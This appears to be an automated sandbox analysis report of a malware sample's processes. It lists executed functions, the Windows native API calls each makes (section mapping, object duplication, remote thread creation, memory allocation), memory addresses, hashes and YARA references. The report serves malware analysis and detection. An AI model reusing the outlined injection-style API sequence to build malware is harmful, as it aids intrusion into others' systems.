Memory Dump Source

Source File: 00000004.00000002.2339629279.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eihchav.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Analysis Process: 3E40.exePID: 5572, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	42.5%
Signature Coverage:	0%
Total number of Nodes:	113
Total number of Limit Nodes:	4

Executed Functions

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 0056003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0056024D

Strings

cess, xrefs: 0056018D
kernel32.dll, xrefs: 0056008F, 00560095

Memory Dump Source

Source File: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_560000_3E40.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 27a86b14edabf9ade6a7e6052f94aea87cf6fba087f3c177ac7a62f14760164d
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: B2526874A01229DFDB64CF58C985BA9BBB1BF09304F1480D9E94DAB391DB30AE85DF14

Function 006BFA97 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 006BFABF
Module32First.KERNEL32(00000000,00000224), ref: 006BFADF

Memory Dump Source

Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 7575ceb237050df873f7dfafd890a7a72d897b5cab12ef2efec254c687181027
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: DEF0F076200314ABD7243BF8AC8CBEF72E9EF48320F100938EA4A911D0DB70EC854B60

Function 00560E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E

Memory Dump Source

Source File: 00000006.00000002.2735166251.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_560000_3E40.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: a5b931f4ea7891f8ec39f80adb89aa55d3030c8fd74fa9dfc01ba301779e0f72
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 6CD0123154512877D7102A94DC09BCE7F1CDF05B62F008411FB0DD9080C771994046E5

Function 00401991 Relevance: 1.3, APIs: 1, Instructions: 64
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction ID: 467f6a5a6a8686429b8edb25725d085830e465699c84407eda40119e08959f9c
Opcode Fuzzy Hash: d33cb06ca2e59f630b26b88e285b187a032fff555d198fadb91c317e02e733b4
Instruction Fuzzy Hash: 8C1121B1709204EBD700AA849DA2EBB3258AB01744F300137B653B90F1D13DA913BBAF

Function 004019A9 Relevance: 1.3, APIs: 1, Instructions: 58
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction ID: 4b76d244f62df5aef60288e90a8a0e9aa1e58495ecd570ece09185835f727098
Opcode Fuzzy Hash: 9898664b938d16c2b1b4e01e78ced3648756847b2d56eb08e3b848ce02c96c48
Instruction Fuzzy Hash: E801CCB1709204EBDB009A849DA2FBB3254AB45704F304177BA53B91F1C13EA513BBAF

Function 004019AF Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction ID: a86496d5c410a92ffac719b016bd7af058b42942f4ddbef250fd57ab9bd781cb
Opcode Fuzzy Hash: 30d86e508bd442fb29cd97d6ceaaa55f0d5a2af66fd42037641b9e80c01793f8
Instruction Fuzzy Hash: BA01DE71309204EBDB00AA848C81BAB3264AB45300F204177F653790F1D23E9522AF5B

Function 004019B8 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 004019E0

Memory Dump Source

Source File: 00000006.00000002.2734923513.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_3E40.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction ID: 05dce09b803754dc438333d14fb16c9d77e26ddd6ef6fde50045693b00902851
Opcode Fuzzy Hash: c7b252bb0c0a7946a725b17b144dae5cf8c90d4b141733e10c6a991a9ec1216b
Instruction Fuzzy Hash: 67019E31309104EBEB009B949C82BAB3764AF46314F2445B7F652B91E1D63D9922AB5B

Function 006BF756 Relevance: 1.3, APIs: 1, Instructions: 48
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 006BF7A7

Memory Dump Source

Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 548c0fa538be18bb4cebbd3d67bb462e0953fc1cd6f1238371e01ae6bd049409
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: BB113C79A00208EFDB01DF98C985E98BFF5AF08350F0580A5F9489B362D771EA90DF80

Non-executed Functions

Function 006AD884 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2735456331.00000000006AD000.00000040.00000020.00020000.00000000.sdmp, Offset: 006AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ad000_3E40.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb7a10a03d9b0ed28564af6f41353144ed0c47f05dfeb756fcfa32a548a8fdb
Instruction ID: ee7b618d3a6b5f73ac552ef94d60ebb6616fcfd5b210766eef61f14f849a0f0a
Opcode Fuzzy Hash: beb7a10a03d9b0ed28564af6f41353144ed0c47f05dfeb756fcfa32a548a8fdb
Instruction Fuzzy Hash: 07B012420496511FC2075754684B7C72FA5EF57340F4108C2A186DF8A3F59805034351

Analysis Process: dghchavPID: 4284, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	42.5%
Signature Coverage:	0%
Total number of Nodes:	113
Total number of Limit Nodes:	4

Executed Functions

Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
Opcode Fuzzy Hash: 2c516529a2ac13b86f5a9833a34ba141477503330a6309f7cab00fb21d89e914
Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66

Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
Opcode Fuzzy Hash: 7ee060c25f7402fbb52614a213f4e0533528eb01ea0636b15e5313f781570415
Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64

Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
Opcode Fuzzy Hash: ece60b1a1f6b7668ef9dd9651a4bb7dd92a40417c9a174c89548745d0f41eda4
Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64

Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
Opcode Fuzzy Hash: 5004b19ac8624500f5096878767cb1f7e044049cfcd571ee7eaf3f6ae6e17c7c
Instruction Fuzzy Hash: 8E51FAB5900249BBEB208F91CC48FAFBBB8EF85710F10415AF911BA2A5D7759941CB64

Function 004015E6 Relevance: 10.7, APIs: 7, Instructions: 163
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction ID: 771dbcf6e2504e630b0d67c3c545d31db11f89db77175d6a648901ef483dfe93
Opcode Fuzzy Hash: f3e491e8a03b641489fc3b5b9cce92a4ae92d047acba71485eea125912a2ab07
Instruction Fuzzy Hash: 5451F9B5900249BFEB208F91CC48FEFBBB8EF85B10F100159F911BA2A5D7709945CB64

Function 00403043 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlCreateUserThread.NTDLL ref: 00403177
NtTerminateProcess.NTDLL ref: 00403190

Memory Dump Source

Source File: 00000007.00000002.2982392219.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_dghchav.jbxd

Similarity

API ID: CreateProcessTerminateThreadUser
String ID:
API String ID: 1921587553-0
Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction ID: 174b4c01c38e91558bfb09f2734ea8af57ab2b253068959c7a4b5a028629c542
Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
Instruction Fuzzy Hash: 2D415A31218E084FD768EF5CA84976277D5FB98311F6A43BAE809D7385EA34DC1183C9

Function 005E003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 005E024D

Strings

cess, xrefs: 005E018D
kernel32.dll, xrefs: 005E008F, 005E0095

Memory Dump Source

Source File: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_5e0000_dghchav.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 8d9f06940a44e2be45beeee2e4bbecad622b7844b54902dca0b4f5182f6b35db
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: A9526874A00269DFDB64CF59C984BA8BBB1BF09304F1480D9E94DAB391DB70AE85DF14

Function 0076F447 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0076F46F
Module32First.KERNEL32(00000000,00000224), ref: 0076F48F

Memory Dump Source

Source File: 00000007.00000002.2983174460.000000000075D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0075D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75d000_dghchav.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: d159c62df291c6e08ebb76ecf766b05b7b48702e16e5c3317d10b3814daed86e
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 0FF06232200715ABD7202AF5B88DA6B7AE8AF49765F140538FA57914C0DF78EC454A61

Function 005E0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,005E0223,?,?), ref: 005E0E19
SetErrorMode.KERNELBASE(00000000,?,?,005E0223,?,?), ref: 005E0E1E

Memory Dump Source

Source File: 00000007.00000002.2982835885.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005E0000, based on PE: false

